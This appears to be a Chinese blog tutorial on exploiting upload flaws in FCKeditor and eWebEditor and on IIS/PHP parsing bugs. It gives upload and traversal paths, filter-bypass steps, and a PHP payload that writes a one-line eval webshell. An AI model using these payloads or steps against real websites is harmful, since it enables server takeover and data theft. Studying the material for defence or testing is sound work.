一.編輯器漏洞

1.編輯器

編輯器屬于第三方軟件，它的作用是方便網站管理員上傳或編輯網站上的內容，類似我們電腦上的Word文檔。

編輯器通常分為兩種情況：

(1) 不需要后臺驗證，可以直接在前臺訪問且操作。通過方法找到編輯器，再進行目錄爆破（用御劍去掃描網站的目錄）和蜘蛛爬行（AWS掃描器去判斷是否存在網站編輯器）。

通常，存在 www.xxx.com/edit 或 www.xxx.com/uploadfiles 的域名，很可能會存在編輯器。

(2) 需要后臺驗證，才能操作編輯器。先通過漏洞或其他方法登錄后臺。

常用編輯器包括：

FCKeditor

EWEbeditor

CKFinder

UEDITOR

DotNet TextBox

Cute Editor

其中，用的次數較多的兩種編輯器是FCK和eWEB，本篇博客將用這兩種編輯器作演示。

2.FCKeditor編輯器漏洞利用

FCKeditor常見上傳目錄：

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

(1) FCK編輯器漏洞 —— “.” 變 “_” 繞過方法

在高版本fck中，直接上傳或抓包修改文件名“a.asp;.jpg”，都會將前面的點變成下劃線，也就是變成“a_asp;.jpg”，這樣我們的文件名解析就無效果了。繞過方法是突破建立文件夾，其實質是利用我們IIS6.0的目錄解析（參考前文）。

編輯器漏洞利用常見步驟如下：

找到編輯器。可以通過編輯器路徑的文件名來判斷是什么編輯器。

確認版本。

搜索該版本編輯器的漏洞利用。

假設路徑為“/fckeditor/editor/filemanager/connectors/test.html”，文件名中包含“fck”，可以直接判定為FCK編輯器。打開如下圖所示：

在FCKeditor中選中“a.asp;.png”并成功上傳，如下圖所示。

打開服務器，可以看到成功上傳的圖片文件。它名字被修改為“a_asp;.png”，這就是FCK高版本的過濾，它將“.”修改為“_”。

(2) FCK編輯器還有一個突破文件上傳漏洞

它是利用IIS6的目錄解析漏洞，我們先建立一個“a.asp”文件夾，然后上傳圖片一句話木馬“a_asp;.png”，IIS6目錄解析漏洞會將“a.asp”目錄下的文件都解析成asp文件去執行。

第一步，打開FCK編輯器并在“a.asp”目錄下上傳一個“b.asp”文件夾。注意，在“Current Folder”中需要填寫“/a.asp”。

第二步，打開BurpSuite軟件抓包。

可以看到，我們在a.asp目錄下創建了“b_asp”文件夾，這是因為“.”被FCK漏洞替換成了“_”。

第三步，這樣“a.asp”文件夾就被成功創建，接著將一句話木馬上傳至該文件夾中。

上傳之后如下圖所示：

當一句話木馬上傳成功之后，我們就可以成功利用Caidao進行Webshell目錄獲取了。最后補充一個FCK編輯器漏洞綜合利用工具：https://www.webshell.cc/4479.html

3.eWebEditor編輯器漏洞

eWebEditor編輯器漏洞利用的基本流程如下：

(1) 進后臺

eWeb編輯器需要登錄后臺，其默認數據庫地址是：ewebeditor/db/ewebeditor.mdb

(2) eweb遍歷漏洞

利用該漏洞遍歷文件目錄、查看整個網站結構及敏感信息

ewebeditor/admin_uploadfile.asp?id=14&dir=./

(3) 修改樣式表上傳文件

如下圖所示，這里選擇某個樣式表進行設置。

然后在圖片類型中，增加“asa”類型。“.asa”可以被當成“.asp”文件去執行，而網站可能會過濾“asp”類型的后綴，所以這里添加“.asa”。

打開“工具欄”，顯示如下圖所示：

點擊“按鈕設置”，準備添加按鈕。

選擇“插入或修改圖片”，然后“保存設置”。

此時返回頁面，點擊“預覽”可以看到我們已經添加的“插入或修改圖片”按鈕。

然后直接上傳“1.asa”文件，如下圖所示。

然后點擊代碼，可以看到這是一個木馬的文件路徑。

所以，編輯器其實就是一個上傳點，通過解析漏洞或多種文件上傳漏洞可以實現繞過并上傳一句話木馬，從而提權。

二.IIS高版本上傳

IIS6.0畢竟是一個低版本，除了靶場和僵尸站很少能夠遇到。真實的滲透中，會遇到很多的問題，比如WAF、高版本過濾、安全狗、被攔截繞過、不解析等等。接下來分享一個IIS高版本上傳思路。

1.畸形解析漏洞

畸形解析漏洞影響版本：IIS7、IIS7.5、Nginx<0.8.03

漏洞產生條件是開啟Fast-CGI或php配置文件中cgi.fix_pathinfo

其漏洞不是IIS本身的問題，而是PHP配置不當造成的問題，根本原因是開啟了cgi.fix_pathinfo選項。由于該漏洞是php配置造成，并且默認開啟該功能，所以它影響了IIS7、IIS7.5、IIS8.5等多個版本，凡是IIS+PHP都有可能會有這個漏洞。

漏洞利用方法：當我們上傳一張名為“1.jpg”的圖片文件，并且這張圖片文件里包含以下代碼。

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>'); ?>

那么它會生成一個叫shell.php的腳本文件，并寫入我們的一句話，密碼為cmd。而一句話的位置是：上傳的圖片文件名字“/shell.php”。如果圖片沒有被改名，那么現在我們的一句話文件在“1.jpg/shell.php”中。

2.案例分析

假設我們向IIS+PHP搭建的遠程服務器上傳“1.jpg”文件。

開啟服務器如下圖所示：

“1.jpg”代碼包含如下代碼 ，它能顯示PHP配置信息。

<?php phpinfo(); ?>

通過URL能夠訪問PHP的版本信息，如下圖所示。該URL運行了我們的PHP代碼，所以才返回相應的配置信息。在URL（49.234.12.78/1.jpg/.php）中，首先訪問“.php”文件，它是不存在的，所以跳到前面的“1.jpg”位置，而“1.jpg”是存在的并且包含php代碼，就會把它當成php文件去執行，并獲取PHP配置信息。

為什么IIS高版本會存在這個漏洞呢？
這是因為IIS高版本在搭建php網站的時候，它會開啟CGI/FastCGI，并且php配置文件選項默認開啟。所以，該畸形解析漏洞不光存在于IIS7、IIS7.5，還有IIS8、IIS10等版本。

接著我們演示另一個代碼，將“1.jpg”內容修改如下，直接寫入shell。

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>'); ?>

訪問“/1.jpg/shell.php”顯示的內容為空。

但是此時會在服務器生成一個名為“shell.php”的文件，如下圖所示：

并且“shell.php”包含了我們的一句話木馬。

這樣通過Caidao即可訪問該頁面，并獲取服務器的文件目錄。

3.aspx漏洞

aspx它有一個“web.config”的配置文件，它規定我們上傳文件的后綴。

我們可以自定一個后綴名來解析aspx文件。

換句話說，當我們遇到可以上傳配置文件的時候，則上傳我們修改好的配置文件，然后自定義一個后綴名如“.ad”，從而繞過WAF或檢測，上傳成功之后它會解析成aspx并執行。如下圖所示：

所以，當我們遇到可以上傳配置文件的時候，通過該方法實現繞過，從而提權。

三.總結

寫到這里，這篇基礎性文章就此結束，最后希望這篇基礎性文章對您有所幫助。作者也是這個領域的菜鳥一枚，希望與您共同進步，共勉。